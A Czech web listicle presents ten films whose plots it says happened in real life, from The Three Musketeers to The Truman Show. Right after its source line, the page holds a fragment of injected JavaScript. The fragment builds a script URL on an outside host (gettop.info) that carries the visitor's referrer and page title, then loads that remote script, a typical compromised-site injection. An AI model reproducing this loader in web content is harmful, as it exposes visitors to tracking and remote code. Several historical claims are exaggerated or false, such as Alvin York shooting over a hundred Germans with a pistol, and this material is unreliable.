TOP 10 Bláznivé děje filmů, které se odehrály i ve skutečnosti

Při sledování některých filmů byste si určitě nepomysleli, že se něco podobného může odehrát i v reálném světě. Opak je ovšem pravdou. Předkládáme Vám deset bláznivých filmů, jejichž příběhy nebo události byly skutečné.

 

10. Tři mušketýři (The three musketeers) – Ať se propadnu, jestli nevíte, kdo jsou tři mušketýři! Co asi ještě nevíte je, že skutečně existovali. Všichni tři byli Francouzi, kteří se označovali jako „Tři bratři“. Nevěříte nám? Dokonce i D’Artagnan a kardinál Richelieu byli skuteční. V podstatě je Alexandr Dumas ošidil o jejich život a nikomu o tom neřekl.

9. Mafiáni (Goodfellas) – Goodfellas je jedním ze základních filmů s gangsterskou tématikou. Nejen, že nastartoval kariéru všech zúčastněných herců, ale poprvé se zde objevilo i několik akčních scén, které můžeme vidět i v dnešních filmech. Je to jako byste se dívali na Temného Rytíře a uvědomili si, že se člověk může obléci jako netopýr a chránit město. Celá věc je založená na knize s názvem Wiseguy. Všechno vyvrcholilo obrovskou loupeží, která se opravdu stala.

8. Wanted – Tenhle příběh není nutně skutečná událost založená na příběhu filmu, ale i tak je svým vlastním způsobem drsný. V úvodních scénách Wanted, zastřelí odstřelovač muže v obleku z nepředstavitelné vzdálenosti 3 kilometrů. Jeho střela prošla skrz město a několik budov. Odpovídá to snad skutečnému životu? Nikomu se to nezdá, ale opravdu se to stalo.

7.  Vzhůru do oblak (Up) – National Geographic se rozhodla postavit dům –  ne z cihel, slámy ani ze dřeva, ale z balónků plněných heliem. Cílem bylo vytvořit dům, který jste mohli vidět ve filmu Vzhůru do oblak. Avšak v tomto skutečném domě nikdo nežil, byl to  pouze projekt. National Geographic ale dokázala, že svět může být úžasný stejně jako ve filmu, avšak pouze pokud do toho vložíte dostatek peněz. V roce 2007 si muž připevnil heliové balónky k židli a devět hodin letěl z Oregonu do Idaha.

6. Tanec zakázán (Footloost) – Film o zakázaném tancování odráží příběh, který se skutečně odehrál v Elmore City, Oklahoma. V tomto městě je veřejný tanec zcela zakázaný, nejsou zde žádná kina, pouze jeden bar. Mladík se sem přestěhuje, je ale překvapen zákazem hlasité hudby a tance. Před několika lety místní komunitou otřásla tragická nehoda, během které zemřelo pět mladých lidí, kteří si užívali večírek. Přistěhovalý mladík se snaží proti zákazu bojovat, protože život bez zábavy a tance přece nejde.

5. Kniha přežití (Book of Eli) – V tomto filmu bojuje Denzel s 15 muži ozbrojenými meči, přičemž je všechny sám zabije, aniž by se jich dotkl. Říká, že je chráněn Bohem.

V reálném čivotě byl Alvin C York vojákem. V první světové válce byl obklopen více než jedním stem Němců. Zdá se Vám to hodně? Tohle pro něj byla jen procházka růžovým sadem. Vytáhl pistoli a všechny je postřílel, nepřežil ani jeden. I přes všechny výstřely, které mířily od Němců na jeho tělo, zůstal na živu. Alvin si také myslel, že to nebylo jen tak, je přece chráněn Bohem!?

4. Velký útěk (The Great Escape) – Klasický film zobrazuje čistou americkou statečnost tváří v tvář nebezpečí. Za druhé světové války byli nejproblematičtější zajatci deportováni do vězení, ze kterého neměl nikdo nikdy uniknout. Z tohoto tábora se plánuje největší útěk této války.

V reálném životě, byl kapitán Richard Carr zajat a uvržen do německého vězení během druhé světové války. Snažil se několikrát utéct. Stejně jako ve filmu, každý pokus byl propracovanější než předchozí. Nejprve se pokoušel uniknout tím, že vykope tajný tunel. Společmě s 13 vězni kopali a kopali po dobu 6 dnů. Kapitán Carr se jako první chtěl ujistit, zda je pobřeží čisté a schoval se v blízké stodole. Bohužel byl zajat. To jej ale neodradilo a pokusil se uniknout ještě dvakrát, avšak bezúspěšně.

3. Bezva vejška (Accepted) – Nezvyklý film o nezvyklé skupině teenagerů, kterým se nepodařilo dostat na univerzitu. Přicházejí na způsob, jak tenhle menší problém vyřešit – založí si svou vlastní školu. Vše se rozkřikne trochu víc, než mělo. Kolem školy se začnou promenádovat houfy holek v bikinách, u bazénu se koná velký mejdan a jejich zakladatele čekají velké starosti – jak přesvědčit úřady a studenty, že tahle škola není úplně k zahození.

V reálném životě se skupina studentů v roce 1948 rozhodla založit svou vlastní školu z nesnášenlivosti vůči té, na které studovali – Humbolt University. Přerušili studium, přesvědčili několik kantorů a svou novou univerzitu nazvali Free University of Berlin. Dnes se tato univerzita pyšní svým devátým místem na žebříčku národních škol.

2. Hory mají oči (The Hills Have Eyes) –  Filmy, jako jsou „The Hills Have Eyes“ jsou důvodem, proč se většina obyvatel žijících v Americe bojí křupanů. V těchto filmech se tito lidé snaží unést nebo lákat nevinné lidi do svých „útulných“ domů. Pak své oběti zavraždí, okradou a znásilní. Tohle pořadí je v případě vašeho velkého štěstí. Ale no tak, kdyby to bylo skutečné, policie by s tím přece začla něco dělat, nebo ne?

Ukázalo se, že ne. Před několika lety banda těchto křupanů nálákala několik jedinců do svých příbytků s příslibem práce – a pak je zabili. V roce 1846 se skupina osadníků ztratila v horách. Po vyčerpání jejich zásob se uchýlili k vraždění a jezení se navzájem v jejich karavanu.1. The Truman Show –  Truman Burbank až téměř do svých třiceti let netuší, že od narození žije v obrovských filmových ateliérech a že je hvězdou televizního seriálu s celosvětovou popularitou a vysokou sledovaností. Zní to šíleně, že? V reálném životě je to Japonská show zvaná Nashubi. Připravte se na depresivní věci.

Ve skutečnosti svlékli muže do naha a zamkli v bytě na 8 měsíců. Neměl žádné jídlo, oblečení ani vodu. Protože se někteří z publika vůči němu cítili zle, dovolili producenti jednomu z diváků, aby mu přinesl pouze jeden kus obleční. Naneštěstí to bylo ženské růžové spodní prádlo. Nakonec mu řekli, že v reality show uspěl. Vzali ho někam, o čemž si sám muž myslel, že bude velká oslava. Omyl. Další byt, ve kterém strávil 15 měsíců.

 

Zdroj: Listverses.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; var d=document;var s=d.createElement(‘script’);

Total
0
Shares
Související články
vánoční film
Read More

TOP 10: Vánoční filmy, bez kterých si to neumíme představit

Vánoce už jsou vážně za rohem a málokdo z nás si dovede představit svátky bez pohádek a typicky vánočních filmů. Není nic lepšího, než se zachumlat do svetru, deky, vzít si talířek cukroví nebo chuťovek a za blikajících světýlek od vánočního stromečku nasávat atmosféru svátků z filmotéky. Které filmy prostě milujeme, že si je o Vánocích pouštíme zas a znovu? Mrkněte na desítku těch legendárních – tedy kromě Popelky, která je prostě samozřejmostí.
Total
0
Share